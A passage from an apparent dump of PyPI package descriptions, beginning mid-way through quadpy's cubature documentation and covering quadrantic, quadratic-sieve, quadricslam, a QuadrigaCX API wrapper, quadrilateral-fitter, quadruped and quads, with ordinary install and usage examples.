If your c2\nhas its sides aligned with the coordinate axes, you can use the convenience\nfunctionquadpy.c2.rectangle_points([x0,x1],[y0,y1])to generate the array.2D space with weight function exp(-r) (E2r)Stroud-Secrest(1963, 2 schemes up to degree 7)Rabinowitz-Richter(1969, 4 schemes up to degree 15)Stroud(1971, degree 4)Haegemans-Piessens(1977, 2 schemes up to degree 9)Cools-Haegemans(1985, 3 schemes up to degree 13)all schemes from the nD space with weight function exp(-r)Example:importquadpyscheme=quadpy.e2r.get_good_scheme(5)scheme.show()val=scheme.integrate(lambdax:x[0]**2)2D space with weight function exp(-r2) (E2r2)Stroud-Secrest(1963, 2 schemes up to degree 7)Rabinowitz-Richter(1969, 5 schemes up to degree 15)Stroud(1971, 3 schemes up to degree 7)Haegemans-Piessens(1977, 2 schemes of degree 9)Cools-Haegemans(1985, 3 schemes up to degree 13)all schemes from the nD space with weight function exp(-r2)Example:importquadpyscheme=quadpy.e2r2.get_good_scheme(3)scheme.show()val=scheme.integrate(lambdax:x[0]**2)Sphere (U3)Albrecht-Collatz(1958, 5 schemes up to degree 7)McLaren(1963, 10 schemes up to degree 14)Lebedev(1976, 34 schemes up to degree 131)Ba\u017eant-Oh(1986, 3 schemes up to degree 13)Heo-Xu(2001, 27 schemes up to degree 39)Fliege-Maier(2007, 4 schemes up to degree 4,\nsingle-precision)all schemes from the n-sphereExample:importnumpyasnpimportquadpyscheme=quadpy.u3.get_good_scheme(19)# scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[0.0,0.0,0.0],1.0)Integration on the sphere can also be done for functions defined in spherical\ncoordinates:importnumpyasnpimportquadpydeff(theta_phi):theta,phi=theta_phireturnnp.sin(phi)**2*np.sin(theta)scheme=quadpy.u3.get_good_scheme(19)val=scheme.integrate_spherical(f)Ball (S3)Ditkin(1948, 3 schemes up to degree 7)Hammer-Stroud(1958, 6 schemes up to degree 7)Mysovskih(1964, degree 7)Stroud(1971, 2 schemes up to degree 14)all schemes from the n-ballExample:importnumpyasnpimportquadpyscheme=quadpy.s3.get_good_scheme(4)# scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[0.0,0.0,0.0],1.0)Tetrahedron (T3)Hammer-Marlowe-Stroud(1956, 3 schemes up to degree 3, also appearing inHammer-Stroud)Stroud(1971, degree 7)Yu(1984, 5 schemes up to degree 6)Keast(1986, 10 schemes up to degree 8)Beckers-Haegemans(1990, degrees 8 and 9)Gatermann(1992, degree 5)Liu-Vinokur(1998, 14 schemes up to degree 5)Walkington(2000, 6 schemes up to degree 7)Zhang-Cui-Liu(2009, 2 schemes up to degree 14)Xiao-Gimbutas(2010, 15 schemes up to degree 15)Shunn-Ham(2012, 6 schemes up to degree 7)Vioreanu-Rokhlin(2014, 10 schemes up to degree 13)Williams-Shunn-Jameson(2014, 1 scheme with\ndegree 9)Witherden-Vincent(2015, 9 schemes up to degree 10)Ja\u015bkowiec-Sukumar(2020, 21 schemes up to degree 20)all schemes for the n-simplex.Example:importnumpyasnpimportquadpyscheme=quadpy.t3.get_good_scheme(5)# scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[[0.0,0.0,0.0],[1.0,0.0,0.0],[0.5,0.7,0.0],[0.3,0.9,1.0]],)Hexahedron (C3)Sadowsky(1940, degree 5)Tyler(1953, 2 schemes up to degree 5)Hammer-Wymore(1957, degree 7)Albrecht-Collatz(1958, degree 3)Hammer-Stroud(1958, 6 schemes up to degree 7)Mustard-Lyness-Blatt(1963, 6 schemes up to degree 5)Stroud(1967, degree 5)Sarma-Stroud(1969, degree 7)Witherden-Vincent(2015, 7 schemes up to degree degree 11)all schemes from the n-cubeProduct schemes derived from line segment schemesExample:importnumpyasnpimportquadpyscheme=quadpy.c3.product(quadpy.c1.newton_cotes_closed(3))# 
scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),quadpy.c3.cube_points([0.0,1.0],[-0.3,0.4],[1.0,2.1]),)Pyramid (P3)Felippa(2004, 9 schemes up to degree 5)Example:importnumpyasnpimportquadpyscheme=quadpy.p3.felippa_5()val=scheme.integrate(lambdax:np.exp(x[0]),[[0.0,0.0,0.0],[1.0,0.0,0.0],[0.5,0.7,0.0],[0.3,0.9,0.0],[0.0,0.1,1.0],],)Wedge (W3)Felippa(2004, 6 schemes up to degree 6)Kubatko-Yeager-Maggi(2013, 21 schemes up to\ndegree 9)Example:importnumpyasnpimportquadpyscheme=quadpy.w3.felippa_3()val=scheme.integrate(lambdax:np.exp(x[0]),[[[0.0,0.0,0.0],[1.0,0.0,0.0],[0.5,0.7,0.0]],[[0.0,0.0,1.0],[1.0,0.0,1.0],[0.5,0.7,1.0]],],)3D space with weight function exp(-r) (E3r)Stroud-Secrest(1963, 5 schemes up to degree 7)all schemes from the nD space with weight function\nexp(-r)Example:importquadpyscheme=quadpy.e3r.get_good_scheme(5)# scheme.show()val=scheme.integrate(lambdax:x[0]**2)3D space with weight function exp(-r2) (E3r2)Stroud-Secrest(1963, 7 schemes up to degree 7)Stroud(1971, scheme of degree 14)all schemes from the nD space with weight function\nexp(-r2)Example:importquadpyscheme=quadpy.e3r2.get_good_scheme(6)# scheme.show()val=scheme.integrate(lambdax:x[0]**2)n-Simplex (Tn)Lauffer(1955, 5 schemes up to degree 5)Hammer-Stroud(1956, 3 schemes up to degree 3)Stroud(1964, degree 3)Stroud(1966, 7 schemes of degree 3)Stroud(1969, degree 5)Silvester(1970, arbitrary degree),Grundmann-M\u00f6ller(1978, arbitrary degree)Walkington(2000, 5 schemes up to degree 7)Example:importnumpyasnpimportquadpydim=4scheme=quadpy.tn.grundmann_moeller(dim,3)val=scheme.integrate(lambdax:np.exp(x[0]),np.array([[0.0,0.0,0.0,0.0],[1.0,2.0,0.0,0.0],[0.0,1.0,0.0,0.0],[0.0,3.0,1.0,0.0],[0.0,0.0,4.0,1.0],]),)n-Sphere (Un)Stroud(1967, degree 7)Stroud(1969, 3 <= n <= 16, degree 11)Stroud(1971, 6 schemes up to degree 5)Dobrodeev(1978, n >= 2, degree 5)Mysovskikh(1980, 2 schemes up to degree 5)Example:importnumpyasnpimportquadpydim=4scheme=quadpy.un.dobrodeev_1978(dim)val=scheme.integrate(lambdax:np.exp(x[0]),np.zeros(dim),1.0)n-Ball (Sn)Stroud(1957, degree 2)Hammer-Stroud(1958, 2 schemes up to degree 5)Stroud(1966, 4 schemes of degree 5)Stroud(1967, 4 <= n <= 7, 2 schemes of degree 5)Stroud(1967, n >= 3, 3 schemes of degree 7)Stenger(1967, 6 schemes up to degree 11)McNamee-Stenger(1967, 6 schemes up to degree 9)Dobrodeev(1970, n >= 3, degree 7)Dobrodeev(1978, 2 <= n <= 20, degree 5)Stoyanova(1997, n >= 5, degree 7)Example:importnumpyasnpimportquadpydim=4scheme=quadpy.sn.dobrodeev_1970(dim)val=scheme.integrate(lambdax:np.exp(x[0]),np.zeros(dim),1.0)n-Cube (Cn)Ewing(1941, degree 3)Tyler(1953, degree 3)Stroud(1957, 2 schemes up to degree 3)Hammer-Stroud(1958, degree 5)Mustard-Lyness-Blatt(1963, degree 5)Thacher(1964, degree 2)Stroud(1966, 4 schemes of degree 5)Phillips(1967, degree 7)McNamee-Stenger(1967, 6 schemes up to degree 9)Stroud(1968, degree 5)Dobrodeev(1970, n >= 5, degree 7)Dobrodeev(1978, n >= 2, degree 5)Cools-Haegemans(1994, 2 schemes up to degree 5)Example:importnumpyasnpimportquadpydim=4scheme=quadpy.cn.stroud_cn_3_3(dim)val=scheme.integrate(lambdax:np.exp(x[0]),quadpy.cn.ncube_points([0.0,1.0],[0.1,0.9],[-1.0,1.0],[-1.0,-0.5]),)nD space with weight function exp(-r) (Enr)Stroud-Secrest(1963, 4 schemes up to degree 5)McNamee-Stenger(1967, 6 schemes up to degree 9)Stroud(1971, 2 schemes up to degree 5)Example:importquadpydim=4scheme=quadpy.enr.stroud_enr_5_4(dim)val=scheme.integrate(lambdax:x[0]**2)nD space with weight function exp(-r2) (Enr2)Stroud-Secrest(1963, 4 schemes up to degree 
5)McNamee-Stenger(1967, 6 schemes up to degree 9)Stroud(1967, 2 schemes of degree 5)Stroud(1967, 3 schemes of degree 7)Stenger(1971, 6 schemes up to degree 11, varying dimensionality restrictions)Stroud(1971, 5 schemes up to degree 5)Phillips(1980, degree 5)Cools-Haegemans(1994, 3 schemes up to degree 7)Lu-Darmofal(2004, degree 5)Xiu(2008, degree 2)Example:importquadpydim=4scheme=quadpy.enr2.stroud_enr2_5_2(dim)val=scheme.integrate(lambdax:x[0]**2)Installationquadpy isavailable from the Python Package Index, so withpip install quadpyyou can install.TestingTo run the tests, check out this repository and typeMPLBACKEND=Agg pytestLicenseThis software is published under theGPLv3 license."} +{"package": "quadra", "pacakge-description": "Deep Learning experiment orchestration tool"} +{"package": "quadrant", "pacakge-description": "UNKNOWN"} +{"package": "quadrantic", "pacakge-description": "Determination of quadrants based on angle, coordinates and othersOverviewThis library allows you to determine quadrant(s) based onangle (360\u00b0 or 400 Gon)location (latlon)SetupVia Pip:pipinstallquadranticVia Github (latest):pipinstallgit+https://github.com/earthobservations/quadranticImplementationsGet quadrant for angleDetermine quadrant based onDegree#####################\n# # 90\u00b0 #\n# # #\n# 180\u00b0 # 0\u00b0 #\n#####################\n# # #\n# # #\n# # 270\u00b0 #\n#####################orGon#####################\n# # 100\u00b0 #\n# # #\n# 200\u00b0 # 0\u00b0 #\n#####################\n# # #\n# # #\n# # 300\u00b0 #\n#####################fromquadranticimportQuadrantFromAngle,AngleUnit,Qquad=QuadrantFromAngle()# no args need for this method# Single quadrantquad.get(45.0,AngleUnit.DEGREE)# [Q.FIRST]# Two quadrantsquad.get(90.0,AngleUnit.DEGREE)# [Q.FIRST, Q.SECOND]# More then full circle (360\u00b0)quad.get(450.0,AngleUnit.DEGREE)# same as above + 360\u00b0# [Q.FIRST, Q.SECOND]# Negative degreequad.get(-45.0,AngleUnit.DEGREE)# [Q.FOURTH]# Degree in Gonquad.get(90.0,AngleUnit.GON)# [Q.FIRST]Get quadrant for coordinates#####################\n# (-1,1) # (1,1) #\n# # #\n# # (0,0) #\n#####################\n# # #\n# # #\n# # #\n#####################fromquadranticimportQuadrantFromCoords,AngleUnit,Qfromshapely.geometryimportPoint# Single quadrantquad=QuadrantFromCoords((0.0,0.0))quad.get((1.0,1.0))# [Q.FIRST]# Two quadrantsquad=QuadrantFromCoords((0.0,0.0))quad.get((0.0,1.0))# [Q.FIRST, Q.SECOND]# All quadrantsquad=QuadrantFromCoords((0.0,0.0))quad.get((0.0,0.0))# [Q.FIRST, Q.SECOND, Q.THIRD, Q.FOURTH]# Single quadrant with shapely Pointquad=QuadrantFromCoords(Point(0.0,0.0))quad.get(Point(1.0,1.0))# [Q.FIRST]ExamplesVisualized examples can be found in theexamplesfolder.LicenseDistributed under the MIT License. 
SeeLICENSE.rstfor more info.ChangelogDevelopment0.1.0 (25.09.2022)Add first version of quadrantic"} +{"package": "quadratic", "pacakge-description": "UNKNOWN"} +{"package": "quadratic-programs", "pacakge-description": "No description available on PyPI."} +{"package": "quadratic-sieve", "pacakge-description": "quadratic-sieveAn implementation of quadratic sieve algorithm for factorization.TechnologiesTechnologies used:Python version: 3.9.1numpy version: 1.20.1Development:py.test version: 6.2.2wheel version: 0.36.2Install$ pip install quadratic_sieveRun$ quadratic_sieve 12666334082118686111Running optionsusage: quadratic_sieve [-h] [-b SMOOTHNESS] [-s BASE_SIZE] [-l] n\n\npositional arguments:\n n Number to factorize.\n\noptional arguments:\n -h, --help show this help message and exit\n -b SMOOTHNESS, --smoothness SMOOTHNESS\n Set smoothness bound.\n -s BASE_SIZE, --base_size BASE_SIZE\n Set the size of generated QS base.\n -l, --loud Display messages while computing.DevelopmentTestingRunning the tests:$ pip install pytest\n$ pytestDistribution building$ pip install wheel\n$ python setup.py bdist_wheelInstalling the built distribution$ pip install dist/quadratic_sieve-0.1.1-py3-none-any.whlMore information about the quadratic sieve algorithm:Smooth numbers and the quadratic sieveA Fast Algorithm for Gaussian Elimination over GF(2) and Its Implementation on the GAPP*"} +{"package": "quadratr", "pacakge-description": "No description available on PyPI."} +{"package": "quadratum", "pacakge-description": "No description available on PyPI."} +{"package": "quadrature", "pacakge-description": "Quadrature"} +{"package": "quadricslam", "pacakge-description": "QuadricSLAMQuadricSLAM is a system for usingquadricsto represent objects in a scene, leveraging common optimisation tools for simultaneous localisation and mapping (SLAM) problems to converge on stable object maps and camera trajectories. This library usesGeorgia Tech's Smoothing and Mapping (GTSAM)library for factor graph optimisation, and adds support through our customGTSAM quadricsextension.TODO update with a more holistic reflection of the repository in its current stateThe key features of this repository are:modular abstractions that allow building QuadricSLAM solutions with custom tools:q=QuadricSLAM(data_source=MyDataSource(),detector=MyDetector(),associator=MyDataAssociator())q.spin()basic Matplotlib visualisation routinesa rich set of plug-n-play examples of the QuadricSLAM system:simple \"hello_world\" examples with dummy datarunning on theTUM RGB-D dataset, as done inour paperTODOplug-n-play on aIntel RealSense D435iwith Python TODOplug-n-play on aIntel RealSense D435iin a ROS ecosystem TODOusing data from photorealistic 3D simulation through anadd-onfor theBenchBot ecosystemTODOWe expect this repository to be active and continually improved upon. If you have any feature requests or experience any bugs, don't hesitate to let us know. Our code is free to use, and licensed under BSD-3. We simply ask that youcite our workif you use QuadricSLAM in your own research.Installation and using the libraryPre-build wheels of this library areavailable on PyPIfor most Linux systems, as well as source distributions. 
Install the library with:pip install quadricslamFrom here basic custom QuadricSLAM systems can be setup by implementing and integrating the following abstract classes:fromquadricslamimportDataSource,Detector,Associator,visualiseclassMyDataSource(DataSource):...classMyDetector(Detector):...classMyAssociator(Associator):...q=QuadricSlam(data_source=MyDataSource(),detector=MyDetector(),associator=MyAssociator(),on_new_estimate=lambdavals,labels,done:visualise(vals,labels,done))))q.spin()The examples described below also provide code showing how to create customisations for a range of different scenarios.Running the examples from this repositoryNote: in the spirit of keeping this package light, some dependencies may not be installed; please install those manuallyThis repository contains a number of examples to demonstrate how QuadricSLAM systems can be set up in different contexts.Each example is a file in thequadricslam_examplesmodule, with a standalonerun()function. There are two possible ways to run each example:Directly through the command line:python -m quadricslam_examples.EXAMPLE_NAME ARGS ...e.g for thehello_quadricslamexamples:python -m quadricslam_examples.hello_quadricslamOr from within Python:fromquadricslam_examples.EXAMPLE_NAMEimportrunrun()hello_manual_quadricslamShows how to create a QuadricSLAM system from scratch using the primitives exposed by ourGTSAM Quadrics library. The scenario is 4 viewpoints in a square around 2 quadrics in the middle of the square:hello_quadricslamSame scenario as thehello_manual_quadricslamexample, but uses the abstractions provided by this library. Shows how an entire QuadricSLAM system can be created with only a few lines of code when the appropriate components are available:tum_rgbd_datasetRe-creation of the TUM RGBD dataset experiments used in ourinitial publication. There is a script included for downloading the dataset.Note: the paper used hand-annotated data to avoid the data association problem; as a result the example here requires a custom data associator to be created before it will runrealsense_pythonDemonstrates how a system can be run using an RGBD RealSense, thepyrealsense2library, and a barebones OpenCV visual odometry algorithm.The example is a simple plug-n-play system, with weak localisation and data association:realsense_rosDemonstrates how a ROS QuadricSLAM system can be put together with an RGBD RealSense, theROS RealSenselibrary, andKimera VIO's visual odometry system.This example includes a script for creating an entire ROS workspace containing all the required packages built from source. Once installed, it runs the same as therealsense_pythonexample but with significantly better localisation:Citing our workIf you are using this library in academic work, please cite thepublication:L. Nicholson, M. Milford and N. S\u00fcnderhauf, \"QuadricSLAM: Dual Quadrics From Object Detections as Landmarks in Object-Oriented SLAM,\" in IEEE Robotics and Automation Letters, vol. 4, no. 1, pp. 1-8, Jan. 
2019, doi: 10.1109/LRA.2018.2866205.PDF.@article{nicholson2019,title={QuadricSLAM: Dual Quadrics From Object Detections as Landmarks in Object-Oriented SLAM},author={Nicholson, Lachlan and Milford, Michael and S\u00fcnderhauf, Niko},journal={IEEE Robotics and Automation Letters},year={2019},}"} +{"package": "quadrigacx", "pacakge-description": "Python QuadrigaCX=================quadrigacx is a Python wrapper for the `QuadrigaCX API (v2)`_.Install~~~~~~~``pip install quadrigacx``or ``pip install setup.py`` in the repo\u2019s main directory after youdownload this repo.Configuration~~~~~~~~~~~~~You will need to create a config file in order to use the authenticatedAPI actions. Use sample.cfg in the config folderUsage~~~~~Basically, create a QCX object, passing in the path to the config file[like in ``quadrigacx/config/sample.cfg``], or the config options in adict [i.e.``{client_id:0000, key:yOurKeY, secret:Y0Ur53crr3T142351236}``]::import quadrigacxqcx = quadrigacx.QCX('config/auth.cfg')That QCX object then has a methods called ``methods`` which will tellyou all of the actions available in this format:::qcx.methods(){'private':[{'name':'name_of_action','requires': {'key': [value for key,value in {'maybe':'some', 'example':'data'}]},'optional': {'key': [value for key,value in {'maybe':'some', 'optional':'data'}]},'returns': {'something': {u'details': u'850.99',u'more_details': u'837.51'}},},],'public':[{'name':'name_of_action','requires': {'key': [value for key,value in {'maybe':'some', 'example':'data'}]},'optional': {'key': [value for key,value in {'maybe':'some', 'optional':'data'}]},'returns': {'something': {u'details': u'850.99',u'more_details': u'837.51'}},}]}You can take that ``name`` and pass it into QCX.api(), along with the``required`` (and ``optional``, if needed) data *as keyword arguments*,and you\u2019ll get something like the expected ``returns``.+------------+------+--------------+------------------+------------------------+-------+| **Function | **Au | **Required | **Default** | **Optional Arguments** | **Def || Name** | th** | Arguments** | | | ault* || | | | | | * |+============+======+==============+==================+========================+=======+| ticker | No | a or a list | [btc\\_cad, | | || | | of valid | btc\\_usd, | | || | | books | eth\\_cad, | | || | | | eth\\_btc] | | |+------------+------+--------------+------------------+------------------------+-------+| order\\_boo | No | a or a list | [btc\\_cad, | A boolean to group | False || k | | of valid | btc\\_usd, | orders with the same | || | | books | eth\\_cad, | price or not | || | | | eth\\_btc] | | |+------------+------+--------------+------------------+------------------------+-------+| transactio | No | a or a list | [btc\\_cad, | A time frame; last | hour || ns | | of valid | btc\\_usd, | \u2018minute\u2019, or \u2018hour\u2019 | || | | books | eth\\_cad, | | || | | | eth\\_btc] | | |+------------+------+--------------+------------------+------------------------+-------+| balance | Yes | | | | |+------------+------+--------------+------------------+------------------------+-------+| user\\_tran | Yes | a or a list | [btc\\_cad, | | || sactions | | of valid | btc\\_usd, | | || | | books | eth\\_cad, | | || | | | eth\\_btc] | | |+------------+------+--------------+------------------+------------------------+-------+| open\\_orde | Yes | open\\_orders | [btc\\_cad, | | || rs | | | btc\\_usd, | | || | | | eth\\_cad, | | || | | | eth\\_btc] | | 
|+------------+------+--------------+------------------+------------------------+-------+| lookup\\_or | Yes | order\\_id | | | || der | | | | | |+------------+------+--------------+------------------+------------------------+-------+| cancel\\_or | Yes | order\\_id | | | || der | | | | | |+------------+------+--------------+------------------+------------------------+-------+| buy | Yes | a valid book | | a price | |+------------+------+--------------+------------------+------------------------+-------+| | | an amount | | | |+------------+------+--------------+------------------+------------------------+-------+| sell | Yes | a valid book | | a price | |+------------+------+--------------+------------------+------------------------+-------+| | | an amount | | | |+------------+------+--------------+------------------+------------------------+-------+| bitcoin\\_d | Yes | | | | || eposit\\_ad | | | | | || dress | | | | | |+------------+------+--------------+------------------+------------------------+-------+| ether\\_dep | Yes | | | | || osit\\_addr | | | | | || ess | | | | | |+------------+------+--------------+------------------+------------------------+-------+| bitcoin\\_w | Yes | an amount | | | || ithdrawal | | | | | |+------------+------+--------------+------------------+------------------------+-------+| | | an address | | | |+------------+------+--------------+------------------+------------------------+-------+| ethereum\\_ | Yes | an amount | | | || withdrawal | | | | | |+------------+------+--------------+------------------+------------------------+-------+| | | an address | | | |+------------+------+--------------+------------------+------------------------+-------+**Notes:**- Not all items in methods() show what the return value is. I willeventually update that, but for now just play around.- I only show what the positive response should look like, negativeresponses could be (and often are) entirely different.- Honestly, you are better off just looking at QuadrigaCX\u2019s API page tosee what resuts they will provide:https://www.quadrigacx.com/api\\_infoExamples:~~~~~~~~~Basic^^^^^::print qcx.api('ticker')>> {'eth_cad': {u'volume': u'730.00552932', u'last': u'15.00', u'timestamp': u'1467639054', u'bid': u'14.90', u'vwap': u'15.47', u'high': u'16.34', u'low': u'15.00', u'ask': u'16.08'}, 'btc_cad': {u'volume': u'161.49814654', u'last': u'886.00', u'timestamp': u'1467639053', u'bid': u'878.20', u'vwap': u'867.00', u'high': u'886.00', u'low': u'856.79', u'ask': u'887.97'}, 'eth_btc': {u'volume': u'2256.84091030', u'last': u'0.01722000', u'timestamp': u'1467639054', u'bid': u'0.01722000', u'vwap': u'0.01794464', u'high': u'0.01855999', u'low': u'0.01722000', u'ask': u'0.01819999'}, 'btc_usd': {u'volume': u'10.06581000', u'last': u'670.00', u'timestamp': u'1467639053', u'bid': u'663.10', u'vwap': u'666.91', u'high': u'700.26', u'low': u'670.00', u'ask': u'688.00'}}Optional Parameter as String^^^^^^^^^^^^^^^^^^^^^^^^^^^^::book = 'btc_cad' # Undocumented ability to send individual values not in a listprint qcx.api('ticker', book_list=book)>> {'btc_cad': {u'volume': u'161.49814654', u'last': u'886.00', u'timestamp': u'1467639054', u'bid': u'878.20', u'vwap': u'867.00', u'high': u'886.00', u'low': u'856.79', u'ask': u'887.97'}}Optional parameter as List^^^^^^^^^^^^^^^^^^^^^^^^^^::book_list = ['btc_cad', 'eth_btc']print qcx.api('ticker', book_list=book_list)>> {'btc_cad': {u'volume': u'161.49814654', u'last': u'886.00', u'timestamp': u'1467639055', u'bid': u'878.20', u'vwap': 
u'867.00', u'high': u'886.00', u'low': u'856.79', u'ask': u'887.97'}, 'eth_btc': {u'volume': u'2256.84091030', u'last': u'0.01722000', u'timestamp': u'1467639055', u'bid': u'0.01722000', u'vwap': u'0.01794464', u'high': u'0.01855999', u'low': u'0.01722000', u'ask': u'0.01819999'}}Limit Purchase with unnamed parameters^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^::book = 'btc_cad'amount = 0.005print qcx.api('buy', book, amount)>> {u'error': {u'message': u'Incorrect : $7.50CAD exceeds available CAD balance', u'code': 21}}"} +{"package": "quadrilateral-fitter", "pacakge-description": "QuadrilateralFitterQuadrilateralFitteris an efficient and easy-to-use library for fitting irregular quadrilaterals from polygons or point clouds.QuadrilateralFitterhelps you find that four corners polygon thatbest approximatesyour noisy data or detection, so you can apply further processing steps like:perspective correctionorpattern matching, without worrying about noise or non-expected vertex.OptimalFitted Quadrilateralis the smallest area quadrilateral that contains all the points inside a given polygon.InstallationYou can installQuadrilateralFitterwith pip:pipinstallquadrilateral-fitterUsageThere is only one line you need to useQuadrilateralFitter:fromquadrilateral_fitterimportQuadrilateralFitter# Fit an input polygon of N sidesfitted_quadrilateral=QuadrilateralFitter(polygon=your_noisy_polygon).fit()If your application can accept fitted quadrilateral to don't strictly include all points within input polygon, you can get the tighter quadrilateral shown asInitial Guesswith:fitted_quadrilateral=QuadrilateralFitter(polygon=your_noisy_polygon).tight_quadrilateralAPI ReferenceQuadrilateralFitter(polygon)Initialize theQuadrilateralFitterinstance..polygon:np.ndarray | tuple | list | shapely.Polygon. List of the polygon coordinates. It must be a list of coordinates, in the formatXY, shape (N, 2).QuadrilateralFitter.fit(simplify_polygons_larger_than = 10):simplify_polygons_larger_than:int | None. List of the polygon coordinates. It must be a list of coordinates, in the formatXY, shape (N, 2). If a number is specified, the method will make a preliminarDouglas-Peuckersimplification of the internally usedConvex Hullif it has more thansimplify_polygons_larger_than vertices. This will speed up the process, but may lead to a sub-optimal quadrilateral approximation. Default: 10.Returns:tuple[tuple[float, float], tuple[float, float], tuple[float, float], tuple[float, float]]: Atuplecontaining the fourXYcoordinates of the fitted cuadrilateral. This quadrilateral will minimize theIoU(Intersection Over Union) with the inputpolygon, while containing all its points inside. 
If your use case can allow loosing points from the input polygon, you can read theQuadrilateralFitter.tight_polygonproperty to obtain a tighter quadrilateral.Real Case ExampleLet's simulate a real case scenario where we detect a noisy polygon from a form that we know should be a perfect rectangle (only deformed by perspective).importnumpyasnpimportcv2image=cv2.cvtColor(cv2.imread('./resources/input_sample.jpg'),cv2.COLOR_BGR2RGB)# Save the Ground Truth cornerstrue_corners=np.array([[50.,100.],[370.,0.],[421.,550.],[0.,614.],[50.,100.]],dtype=np.float32)# Generate a simulated noisy detectionsides=[np.linspace([x1,y1],[x2,y2],20)+np.random.normal(scale=10,size=(20,2))for(x1,y1),(x2,y2)inzip(true_corners[:-1],true_corners[1:])]noisy_corners=np.concatenate(sides,axis=0)# To simplify, we will clip the corners to be within the imagenoisy_corners[:,0]=np.clip(noisy_corners[:,0],a_min=0.,a_max=image.shape[1])noisy_corners[:,1]=np.clip(noisy_corners[:,1],a_min=0.,a_max=image.shape[0])And now, let's runQuadrilateralFitterto find the quadrilateral that best approximates our noisy detection (without leaving points outside).fromquadrilateral_fitterimportQuadrilateralFitter# Define the fitter (we want to keep it for reading internal variables later)fitter=QuadrilateralFitter(polygon=noisy_corners)# Get the fitted quadrilateral that contains all the points inside the input polygonfitted_quadrilateral=np.array(fitter.fit(),dtype=np.float32)# If you wanna to get a tighter mask, less likely to contain points outside the real quadrilateral,# but that cannot ensure to always contain all the points within the input polygon, you can use:tight_quadrilateral=np.array(fitter.tight_quadrilateral,dtype=np.float32)# To show the plot of the fitting processfitter.plot()Finally, for use cases like this, we could use fitted quadrilaterals to apply a perspective correction to the image, so we can get a visual insight of the results.# Generate the destiny points for the perspective correction by adjusting it to a perfect rectangleh,w=image.shape[:2]forquadrilateralin(fitted_quadrilateral,tight_quadrilateral):# Cast it to a numpy for agile manipulationquadrilateral=np.array(quadrilateral,dtype=np.float32)# Get the bounding box of the fitted quadrilateralmin_x,min_y=np.min(quadrilateral,axis=0)max_x,max_y=np.max(quadrilateral,axis=0)# Define the destiny points for the perspective correctiondestiny_points=np.array(((min_x,min_y),(max_x,min_y),(max_x,max_y),(min_x,max_y)),dtype=np.float32)# Calculate the homography matrix from the quadrilateral to the rectanglehomography_matrix,_=cv2.findHomography(srcPoints=quadrilateral,dstPoints=rect_points)# Warp the image using the homography matrixwarped_image=cv2.warpPerspective(src=image,M=homography_matrix,dsize=(w,h))"} +{"package": "quadrilemma", "pacakge-description": "QuadrilemmaYes, No, Unknown or Unknowable?"} +{"package": "quadrille", "pacakge-description": "quadrilleSquare grid simulationsConway's Game of LifeCreditsThanks tobethlenkeatHSBPfor describing\nhis C algorithm for grid advancement in a Conway implementation\nwhich was the starting point of my own approachLicenseMozilla Public License 2.0This Source Code Form is subject to the terms of the Mozilla Public\nLicense, v. 2.0. 
If a copy of the MPL was not distributed with this\nfile, You can obtain one at http://mozilla.org/MPL/2.0/."} +{"package": "quadro", "pacakge-description": "'''Have to see'''"} +{"package": "quadroots", "pacakge-description": "quadrootsCalculate Quadratic Roots"} +{"package": "quadruped", "pacakge-description": "QuadrupedMy robot software.YouTubeVimeoDocumentationNote:This re-write is still very early and not fully running yet, just\nparts.InstalllinuxYou will also need:pip install ds4drvpipThe recommended way to install this library is:pip install quadrupedDevelopmentIf you wish to develop and submit git-pulls, you can do:git clone https://github.com/MomsFriendlyRobotCompany/quadruped\ncd quadruped\npip install -e .TestingSince I have both python2 and python3 installed, I need to test with both:python2 -m nose *.py\npython3 -m nose *.pyLayoutHere issortof the layout of the code:Quadruped (see examples folders):Engine(serial)AHRS() - tilt compensated compassIMU() - NXP IMU from AdafruitMCP3208() - ADC for IR and whatever elseGait:command() - plans all feet through 1 gait cycle (12 steps)eachLeg(x,y,z)Engine({serial}): - handles movement hardwarelegs[4]servos[3]anglesetServoLimits()bulkWrite() - change to synccoxa, femur, tibiafk()ik()moveFoot(x,y,z)moveFootAngle(a,b,c)The example quadruped (in the examples folder), takes a dictionary. Currently\nit takes:data = {\n 'serialPort': '/dev/tty.usbserial-AL034G2K',\n 'write': 'bulk'\n}If you don\u2019t pass it a serial port, then it falls back to a simulated serial\nport (which does nothing) which is useful for testing.ToolsThis directory contains several tools for the robot:Change Log2017-Jul-070.4.1broke out into package and published to PyPi2016-Aug-100.0.1initMIT LicenseCopyright (c) 2016 Kevin J. WalchkoPermission is hereby granted, free of charge, to any person obtaining a copy of\nthis software and associated documentation files (the \u201cSoftware\u201d), to deal in\nthe Software without restriction, including without limitation the rights to\nuse, copy, modify, merge, publish, distribute, sublicense, and/or sell copies\nof the Software, and to permit persons to whom the Software is furnished to do\nso, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \u201cAS IS\u201d, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR\nCOPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER\nIN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE."} +{"package": "quadruplet", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quads", "pacakge-description": "quadsA pure Python Quadtree implementation.Quadtreesare a useful data\nstructure for sparse datasets where the location/position of the data is\nimportant. 
